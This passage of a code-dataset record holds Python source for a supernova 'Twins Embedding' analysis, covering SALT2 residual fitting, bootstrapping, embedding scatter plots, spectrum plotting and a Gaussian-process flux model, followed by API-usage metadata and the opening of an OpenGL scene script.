{result['ref_mag']:.3f}\")\n print(f\" alpha: {result['alpha']:.3f}\")\n print(f\" beta: {result['beta']:.3f}\")\n print(f\" σ_int: {result['intrinsic_dispersion']:.3f}\")\n print(f\" RMS: {result['rms']:.3f}\")\n print(f\" NMAD: {result['nmad']:.3f}\")\n 
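# ('wrms' in the result dict above is res.fun, the weighted dispersion\n            # minimized by the standardization fit.)\n            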
print(f\"  WRMS: {result['wrms']:.3f}\")\n\n        for i in range(len(additional_covariates)):\n            covariate_amplitude = res.x[3 + i]\n            result[f'covariate_amplitude_{i}'] = covariate_amplitude\n            if verbosity >= 1:\n                print(f\"  amp[{i}]: {covariate_amplitude:.3f}\")\n\n        return result\n\n    def bootstrap_salt_magnitude_residuals(self, num_samples=100, *args, **kwargs):\n        \"\"\"Bootstrap the SALT2 magnitude residuals fit to get parameter uncertainties.\n\n        Parameters\n        ----------\n        num_samples : int\n            The number of bootstrapping samples to do.\n        *args, **kwargs\n            Additional parameters passed to fit_salt_magnitude_residuals.\n\n        Returns\n        -------\n        reference : dict\n            The reference values for the non-bootstrapped data.\n        samples : `astropy.table.Table`\n            A Table with all of the keys from fit_salt_magnitude_residuals with\n            one row per bootstrap.\n        \"\"\"\n        # Calculate reference result\n        reference = self.fit_salt_magnitude_residuals(*args, verbosity=0, **kwargs)\n\n        # Do bootstrapping\n        samples = []\n\n        for i in tqdm(range(num_samples), leave=False, desc='SALT2 bootstrapping'):\n            samples.append(\n                self.fit_salt_magnitude_residuals(*args, bootstrap=True, verbosity=0,\n                                                  **kwargs)\n            )\n\n        samples = table.Table(samples)\n\n        return reference, samples\n\n    def calculate_fit_rv(self, slope, slope_uncertainty=None):\n        \"\"\"Calculate the true RV value given an additional correction in AV that was\n        applied to the corrected magnitude residuals.\n        \"\"\"\n        def to_min(x, measured_color_law):\n            return np.sum((extinction.fitzpatrick99(self.wave, x[0], x[1]) -\n                           measured_color_law)**2)\n\n        res = minimize(\n            to_min,\n            [1., self.settings['rbtl_fiducial_rv']],\n            args=(self.rbtl_color_law + slope,)\n        )\n        true_rv = res.x[1]\n\n        if slope_uncertainty is None:\n            return true_rv\n        else:\n            res_up = minimize(\n                to_min,\n                res.x,\n                args=(self.rbtl_color_law + slope + slope_uncertainty,)\n            )\n\n            res_down = minimize(\n                to_min,\n                res.x,\n                args=(self.rbtl_color_law + slope - slope_uncertainty,)\n            )\n\n            true_rv_uncertainty = (res_up.x[1] - res_down.x[1]) / 2.\n            return true_rv, true_rv_uncertainty\n\n    def scatter(self, variable, mask=None, weak_mask=None, label=None, axis_1=0,\n                axis_2=1, axis_3=None, invert_colorbar=False, **kwargs):\n        \"\"\"Make a scatter plot of some variable against the Isomap coefficients\n\n        variable is the values to use for the color axis of the plot.\n\n        A boolean array can be passed as mask to specify which points to use in the\n        plot. If mask is None, then the full variable list is used.\n\n        The target variable can be passed with or without the mask already applied. This\n        function will check and automatically apply it or ignore it so that the variable\n        array has the same length as the coefficient arrays.\n\n        Optionally, a weak mask can be applied where spectra not passing it are\n        plotted as small points rather than being completely omitted. 
To do this,\n        specify the \"weak_mask\" parameter with a boolean array that has the length of\n        the variable array after the base mask.\n\n        Any kwargs are passed to plt.scatter directly.\n        \"\"\"\n        use_embedding = self.embedding\n        use_var = variable\n\n        if mask is not None:\n            use_embedding = use_embedding[mask]\n            use_var = use_var[mask]\n\n        cmap = self.settings['colormap']\n\n        if invert_colorbar:\n            cmap = cmap.reversed()\n\n        marker_size = self.settings['scatter_plot_marker_size']\n\n        if weak_mask is not None:\n            # Variable marker size\n            marker_size = 10 + (marker_size - 10) * weak_mask[mask]\n\n        plot_kwargs = {\n            's': marker_size,\n            'edgecolors': 'gray',\n            'cmap': cmap,\n        }\n        plot_kwargs.update(kwargs)\n\n        fig = plt.figure()\n\n        if use_embedding.shape[1] >= 3 and axis_3 is not None:\n            ax = fig.add_subplot(111, projection=\"3d\")\n            plot = ax.scatter(\n                use_embedding[:, axis_1],\n                use_embedding[:, axis_2],\n                use_embedding[:, axis_3],\n                c=use_var,\n                **plot_kwargs\n            )\n            ax.set_zlabel(\"$\\\\xi_%d$\" % (axis_3 + 1))\n        else:\n            ax = fig.add_subplot(111)\n            plot = ax.scatter(\n                use_embedding[:, axis_1],\n                use_embedding[:, axis_2],\n                c=use_var,\n                **plot_kwargs\n            )\n\n        ax.set_xlabel(\"$\\\\xi_%d$\" % (axis_1 + 1))\n        ax.set_ylabel(\"$\\\\xi_%d$\" % (axis_2 + 1))\n\n        if label is not None:\n            cb = fig.colorbar(plot, label=label)\n        else:\n            cb = fig.colorbar(plot)\n\n        if invert_colorbar:\n            # workaround: in my version of matplotlib, the ticks disappear if\n            # you invert the colorbar y-axis. Save the ticks, and put them back\n            # to work around that bug.\n            ticks = cb.get_ticks()\n            cb.ax.invert_yaxis()\n            cb.set_ticks(ticks)\n\n    def scatter_combined(self, variable, mask=None, label=None, axis_1=0, axis_2=1,\n                         axis_3=2, vmin=None, vmax=None, cmap=None,\n                         discrete_color_map=None, invert_colorbar=False, **kwargs):\n        \"\"\"Scatter plot that shows three components simultaneously while preserving\n        aspect ratios.\n\n        The height of the figure will be adjusted automatically to produce the right\n        aspect ratio.\n        \"\"\"\n        use_embedding = self.embedding\n\n        if np.ndim(variable) == 2:\n            c12 = variable[0]\n            c13 = variable[1]\n            c32 = variable[2]\n        else:\n            c12 = c13 = c32 = variable\n\n        if mask is not None:\n            use_embedding = use_embedding[mask]\n            c12 = c12[mask]\n            c13 = c13[mask]\n            c32 = c32[mask]\n\n        if discrete_color_map is not None:\n            cmap = ListedColormap(discrete_color_map.values())\n            color_id_map = {j: i for i, j in enumerate(discrete_color_map)}\n            c12 = [color_id_map[i] for i in c12]\n            c13 = [color_id_map[i] for i in c13]\n            c32 = [color_id_map[i] for i in c32]\n        else:\n            if cmap is None:\n                cmap = self.settings['colormap']\n\n            if invert_colorbar:\n                cmap = cmap.reversed()\n\n            sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin,\n                                                                     vmax=vmax))\n            sm._A = []\n\n            c12 = sm.to_rgba(c12)\n            c13 = sm.to_rgba(c13)\n            c32 = sm.to_rgba(c32)\n\n        min_1 = np.min(use_embedding[:, axis_1])\n        max_1 = np.max(use_embedding[:, axis_1])\n        min_2 = np.min(use_embedding[:, axis_2])\n        max_2 = np.max(use_embedding[:, axis_2])\n        min_3 = np.min(use_embedding[:, axis_3])\n        max_3 = np.max(use_embedding[:, axis_3])\n\n        range_1 = max_1 - min_1\n        range_2 = max_2 - min_2\n        range_3 = max_3 - min_3\n\n        border = 0.1\n\n        min_1 -= border * range_1\n        max_1 += border * range_1\n        min_2 -= border * range_2\n        max_2 += border * range_2\n        min_3 -= border * range_3\n        max_3 += border * range_3\n\n        range_1 *= (1 + 2. * border)\n        range_2 *= (1 + 2. * border)\n        range_3 *= (1 + 2. 
* border)\n\n if discrete_color_map:\n # Don't show a colorbar\n ncols = 2\n width_ratios = [range_1, range_3]\n else:\n # Add axes for a colorbar\n colorbar_frac = 0.025\n\n plot_width = 1 - colorbar_frac\n width_1 = plot_width * range_1 / (range_1 + range_3)\n width_3 = plot_width * range_3 / (range_1 + range_3)\n\n ncols = 3\n width_ratios = [width_1, width_3, colorbar_frac]\n\n # Set the figure width. The height will be adjusted automatically to produce the\n # right aspect ratio.\n fig_width = self.settings['combined_scatter_plot_width']\n fig = plt.figure(figsize=(fig_width, fig_width))\n gs = GridSpec(\n 2, ncols,\n figure=fig,\n height_ratios=[range_3, range_2],\n width_ratios=width_ratios,\n )\n\n ax12 = fig.add_subplot(gs[1, 0])\n ax13 = fig.add_subplot(gs[0, 0], sharex=ax12)\n ax32 = fig.add_subplot(gs[1, 1], sharey=ax12)\n\n if discrete_color_map:\n # Show the legend in the middle of the upper right open space.\n legend_ax = fig.add_subplot(gs[0, 1])\n legend_ax.axis('off')\n else:\n # Show the colorbar on the right side of everything.\n cax = fig.add_subplot(gs[:, 2])\n\n plot_kwargs = {\n 's': self.settings['combined_scatter_plot_marker_size'],\n 'edgecolors': 'gray',\n }\n\n if discrete_color_map:\n plot_kwargs['cmap'] = cmap\n\n plot_kwargs.update(kwargs)\n\n scatter = ax12.scatter(\n use_embedding[:, axis_1],\n use_embedding[:, axis_2],\n c=c12,\n **plot_kwargs,\n )\n ax12.set_xlabel(f'$\\\\xi_{axis_1 + 1}$')\n ax12.set_ylabel(f'$\\\\xi_{axis_2 + 1}$')\n ax12.set_xlim(min_1, max_1)\n ax12.set_ylim(min_2, max_2)\n\n ax13.scatter(\n use_embedding[:, axis_1],\n use_embedding[:, axis_3],\n c=c13,\n **plot_kwargs\n )\n ax13.set_ylabel(f'$\\\\xi_{axis_3 + 1}$')\n ax13.tick_params(labelbottom=False)\n ax13.set_ylim(min_3, max_3)\n\n ax32.scatter(\n use_embedding[:, axis_3],\n use_embedding[:, axis_2],\n c=c32,\n **plot_kwargs\n )\n ax32.set_xlabel(f'$\\\\xi_{axis_3 + 1}$')\n ax32.tick_params(labelleft=False)\n ax32.set_xlim(min_3, max_3)\n\n if discrete_color_map:\n # Show a legend with the discrete colors\n legend_ax.legend(handles=scatter.legend_elements()[0],\n labels=discrete_color_map.keys(),\n loc='center')\n else:\n # Show a colorbar\n if label is not None:\n cb = fig.colorbar(sm, cax=cax, label=label)\n else:\n cb = fig.colorbar(sm, cax=cax)\n\n if invert_colorbar:\n # workaround: in my version of matplotlib, the ticks disappear if\n # you invert the colorbar y-axis. 
Save the ticks, and put them back\n # to work around that bug.\n ticks = cb.get_ticks()\n cb.ax.invert_yaxis()\n cb.set_ticks(ticks)\n\n # Calculate the aspect ratio, and regenerate the figure a few times until we get\n # it right.\n while True:\n fig.canvas.draw()\n\n coord = ax12.get_position() * fig.get_size_inches()\n plot_width = coord[1][0] - coord[0][0]\n plot_height = coord[1][1] - coord[0][1]\n plot_ratio = plot_height / plot_width\n\n aspect_ratio = plot_ratio / ax12.get_data_ratio()\n\n if np.abs(aspect_ratio - 1) < 0.001:\n # Good enough\n break\n\n fig.set_size_inches([fig_width, fig.get_size_inches()[1] / aspect_ratio])\n\n return ax12, ax13, ax32\n\n def plot_flux(self, ax, flux, fluxerr=None, *args, c=None, label=None,\n uncertainty_label=None, **kwargs):\n \"\"\"Plot a spectrum.\n\n See settings.py for details about the normalization and labeling of spectra.\n \"\"\"\n wave = self.wave\n\n plot_format = self.settings['spectrum_plot_format']\n\n if plot_format == 'f_nu':\n plot_scale = wave**2 / 5000.**2\n elif plot_format == 'f_lambda':\n plot_scale = 1.\n else:\n raise TwinsEmbeddingException(f\"Invalid plot format {plot_format}\")\n\n flux = np.atleast_2d(flux)\n if fluxerr is not None:\n fluxerr = np.atleast_2d(fluxerr)\n\n for idx in range(len(flux)):\n if label is None:\n use_label = None\n elif np.isscalar(label):\n if idx == 0:\n use_label = label\n else:\n use_label = None\n else:\n use_label = label[idx]\n\n ax.plot(wave, flux[idx] * plot_scale, *args, c=c, label=use_label, **kwargs)\n\n if fluxerr is not None:\n if uncertainty_label is None:\n use_uncertainty_label = None\n elif np.isscalar(uncertainty_label):\n if idx == 0:\n use_uncertainty_label = uncertainty_label\n else:\n use_uncertainty_label = None\n else:\n use_uncertainty_label = uncertainty_label[idx]\n\n ax.fill_between(\n wave,\n (flux[idx] - fluxerr[idx]) * plot_scale,\n (flux[idx] + fluxerr[idx]) * plot_scale,\n facecolor=c,\n alpha=0.3,\n label=use_uncertainty_label,\n )\n\n ax.set_xlabel(self.settings['spectrum_plot_xlabel'])\n ax.set_ylabel(self.settings['spectrum_plot_ylabel'])\n ax.autoscale()\n ax.set_ylim(0, None)\n\n if label is not None:\n ax.legend()\n\n def savefig(self, filename, figure=None, **kwargs):\n \"\"\"Save a matplotlib figure\n\n Parameters\n ----------\n filename : str\n The output filename. This will be placed in the directory specified by\n self.settings['figure_directory']\n figure : `matplotlib.pyplot.figure` instance or None\n The matplotlib figure to save. If figure is None, then we get the current\n figure from matplotlib and save that.\n **kwargs\n Additional kwargs to pass to savefig.\n \"\"\"\n if figure is None:\n figure = plt.gcf()\n\n directory = self.settings['figure_directory']\n os.makedirs(directory, exist_ok=True)\n\n path = os.path.join(directory, filename)\n\n figure.savefig(\n path,\n **kwargs\n )\n\n def latex_open(self, filename):\n \"\"\"Open a given latex file for writing, and make directories if need be.\n\n Parameters\n ----------\n filename : str\n The output filename. This will be placed in the directory specified by\n self.settings['latex_directory']\n \"\"\"\n directory = self.settings['latex_directory']\n os.makedirs(directory, exist_ok=True)\n\n path = os.path.join(directory, filename)\n\n return open(path, 'w')\n\n\nclass TwinsEmbeddingModel():\n \"\"\"A standalone implementation of the Twins Embedding model.\n\n This can be used to predict the flux of a supernova at any given coordinates in\n the Twins Embedding. 
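A typical call is `model.evaluate(phase, magnitude, color, coordinates)`, which returns the predicted flux and its uncertainty (see `evaluate` below). 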
The model will be loaded from data stored in the models\n directory.\n \"\"\"\n def __init__(self, data=None):\n if data is None:\n data = self._load_data('./models/twins_embedding_1.pkl')\n\n self.data = data\n\n # Build the GPs\n self.gps = []\n for idx in range(len(self.data['gp_parameters'])):\n gp = ManifoldGaussianProcess(\n None,\n self.data['ref_coordinates'][idx],\n self.data['ref_values'][idx],\n self.data['ref_uncertainties'][idx],\n parameters=self.data['gp_parameters'][idx]\n )\n self.gps.append(gp)\n\n def write(self, path):\n with open(path, 'wb') as f:\n pickle.dump(self.data, f)\n\n @classmethod\n def _load_data(cls, path):\n with open(path, 'rb') as f:\n data = pickle.load(f)\n return data\n\n @classmethod\n def load(cls, path):\n data = cls._load_data(path)\n return cls(data)\n\n @property\n def wave(self):\n return self.data['wave']\n\n def evaluate_phase_difference(self, phase):\n phase_difference = (\n self.data['phase_slope'] * phase\n + self.data['phase_quadratic'] * phase * phase\n )\n\n return phase_difference\n\n def evaluate_phase_dispersion(self, phase):\n coefs = self.data['phase_dispersion_coefficients']\n num_phase_coefficients = len(coefs)\n phase_scale = np.abs((num_phase_coefficients / 2)\n * (phase / self.data['phase_range']))\n full_bins = int(np.floor(phase_scale))\n remainder = phase_scale - full_bins\n\n phase_coefficients = np.zeros(num_phase_coefficients)\n\n for j in range(full_bins + 1):\n if j == full_bins:\n weight = remainder\n else:\n weight = 1\n\n if weight == 0:\n break\n\n if phase > 0:\n phase_bin = num_phase_coefficients // 2 + j\n else:\n phase_bin = num_phase_coefficients // 2 - 1 - j\n\n phase_coefficients[phase_bin] = weight\n\n fractional_dispersion = phase_coefficients.dot(coefs)\n\n return fractional_dispersion\n\n def evaluate(self, phase, magnitude, color, coordinates):\n # Make sure that we are in bounds\n phase_range = self.data['phase_range']\n if np.abs(phase) > phase_range:\n raise Exception(f\"Invalid phase {phase}, must be between -{phase_range}\"\n f\" and {phase_range}.\")\n\n # Phase shifts\n phase_difference = self.evaluate_phase_difference(phase)\n phase_dispersion = self.evaluate_phase_dispersion(phase)\n\n # Figure out the scale\n scale = (\n self.data['mean_flux']\n * 10**(-0.4 * (\n magnitude\n + self.data['color_law'] * color\n + phase_difference)\n )\n )\n\n # Evaluate each GP\n pred = []\n pred_error = []\n for gp in self.gps:\n iter_pred, iter_pred_error = gp.predict(coordinates)\n pred.append(iter_pred)\n pred_error.append(iter_pred_error)\n\n pred = (1 + np.array(pred)[:, 0])\n pred_error = (np.array(pred_error)[:, 0])\n\n # Apply the scale\n flux = scale * pred\n flux_error = scale * pred_error\n\n # Add in uncertainties from the phase interpolation model. 
They are measured\n # in fractions of the flux.\n flux_error = np.sqrt(\n flux_error**2\n + (phase_dispersion * flux)**2\n )\n\n return flux, flux_error\n", "repo_name": "snfactory/twins_embedding", "sub_path": "twins_embedding.py", "file_name": "twins_embedding.py", "file_ext": "py", "file_size_in_byte": 68055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "settings.default_settings", "line_number": 31, "usage_type": "argument"}, {"api_name": "matplotlib.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "idrtools.Dataset.from_idr", "line_number": 86, "usage_type": "call"}, {"api_name": "idrtools.Dataset", "line_number": 86, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tqdm.autonotebook.tqdm", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 182, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 187, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 187, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 194, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 272, "usage_type": "call"}, {"api_name": "utils.load_stan_model", "line_number": 303, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 315, "usage_type": "call"}, {"api_name": "utils.load_stan_result", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 368, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 372, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 396, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 400, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 
400, "usage_type": "attribute"}, {"api_name": "utils.save_stan_result", "line_number": 410, "usage_type": "call"}, {"api_name": "extinction.fitzpatrick99", "line_number": 421, "usage_type": "call"}, {"api_name": "utils.load_stan_model", "line_number": 427, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 440, "usage_type": "call"}, {"api_name": "utils.load_stan_result", "line_number": 444, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 458, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 459, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 464, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 465, "usage_type": "call"}, {"api_name": "sys.stdout.flush", "line_number": 476, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 476, "usage_type": "attribute"}, {"api_name": "utils.save_stan_result", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 505, "usage_type": "call"}, {"api_name": "idrtools.math.calculate_covariance_finite_difference", "line_number": 509, "usage_type": "call"}, {"api_name": "idrtools.math", "line_number": 509, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 512, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 512, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 517, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 525, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 526, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 532, "usage_type": "attribute"}, {"api_name": "utils.frac_to_mag", "line_number": 551, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 554, "usage_type": "call"}, {"api_name": "utils.frac_to_mag", "line_number": 555, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 558, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.errstate", "line_number": 573, "usage_type": "call"}, {"api_name": "sklearn.manifold.Isomap", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 609, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 613, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 616, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 632, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 632, "usage_type": "name"}, {"api_name": "astropy.table.hstack", "line_number": 646, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 646, "usage_type": "name"}, {"api_name": "astropy.table.MaskedColumn", "line_number": 658, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 658, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 664, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 664, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 668, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 668, "usage_type": "name"}, {"api_name": "specind.Spectrum", "line_number": 681, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 687, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 687, "usage_type": "name"}, {"api_name": "astropy.table.Table.read", "line_number": 
719, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 719, "usage_type": "attribute"}, {"api_name": "astropy.table", "line_number": 719, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 722, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 722, "usage_type": "name"}, {"api_name": "astropy.table.join", "line_number": 725, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 725, "usage_type": "name"}, {"api_name": "pickle.loads", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 743, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 743, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 743, "usage_type": "attribute"}, {"api_name": "astropy.table.Table", "line_number": 746, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 746, "usage_type": "name"}, {"api_name": "astropy.table.Table", "line_number": 799, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 799, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 866, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 867, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 868, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 872, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 872, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 872, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 909, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 914, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 916, "usage_type": "call"}, {"api_name": "utils.fill_mask", "line_number": 917, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 926, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 1016, "usage_type": "call"}, {"api_name": "manifold_gp.ManifoldGaussianProcess", "line_number": 1024, "usage_type": "call"}, {"api_name": "manifold_gp.fit", "line_number": 1033, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 1069, "usage_type": "call"}, {"api_name": "utils.frac_to_mag", "line_number": 1071, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1091, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 1120, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 1139, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1139, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1156, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1157, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1158, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1168, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 1188, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1196, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1208, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1219, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1230, "usage_type": "call"}, {"api_name": "idrtools.math.nmad", "line_number": 1231, "usage_type": "call"}, {"api_name": "idrtools.math", "line_number": 1231, "usage_type": 
"name"}, {"api_name": "tqdm.autonotebook.tqdm", "line_number": 1279, "usage_type": "call"}, {"api_name": "astropy.table.Table", "line_number": 1285, "usage_type": "call"}, {"api_name": "astropy.table", "line_number": 1285, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 1294, "usage_type": "call"}, {"api_name": "extinction.fitzpatrick99", "line_number": 1294, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1297, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1307, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 1313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1367, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1367, "usage_type": "name"}, {"api_name": "numpy.ndim", "line_number": 1415, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 1429, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm.ScalarMappable", "line_number": 1441, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 1441, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 1441, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Normalize", "line_number": 1441, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1449, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1450, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1451, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1452, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 1453, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1491, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 1492, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1584, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 1609, "usage_type": "call"}, {"api_name": "numpy.atleast_2d", "line_number": 1611, "usage_type": "call"}, {"api_name": "numpy.isscalar", "line_number": 1616, "usage_type": "call"}, {"api_name": "numpy.isscalar", "line_number": 1629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 1669, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1669, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 1672, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1674, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1674, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1691, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1693, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1693, "usage_type": "attribute"}, {"api_name": "manifold_gp.ManifoldGaussianProcess", "line_number": 1714, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 1725, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 1730, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1753, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 1755, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1758, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1783, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1809, 
"usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1810, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 1818, "usage_type": "call"}]}
+{"seq_id": "71581379608", "text": "# imports all openGL functions\nfrom OpenGL.GL import *\n\n#import glu\nfrom OpenGL.GLU import *\n\n# pygame is just used to create a window with the operating system on which to draw.\nimport pygame\n\n# we will use numpy to store data in arrays\nimport numpy as np\n\nimport time\n\nimport blender\nimport Shader\nfrom Material import Material, FaceTypes\nfrom Texture import Texture\nfrom Camera import Camera\nfrom Quaternion import Quaternion\nfrom Light import *\nfrom Mesh import Mesh\nfrom Skybox import Skybox\nfrom PostProcessing import PostProcessing\nfrom Water import Water\n\nfrom Programs import Programs\nfrom InstancedField import InstancedField\n\nfrom MathUtils import *\n\nimport random\n\nimport yaml\n\nfrom custom_logging import LOG, LogLevel\n\nfrom PIL import Image\n\nstart_time = time.time()\n\npygame.init()\n\ninitialized = False\n\nclass Scene:\n def __init__(self):\n self.width = 1920#1024\n self.height = 1080#768\n\n self.screen = pygame.display.set_mode((self.width, self.height), pygame.OPENGL | pygame.DOUBLEBUF, 32)\n\n self.clock = 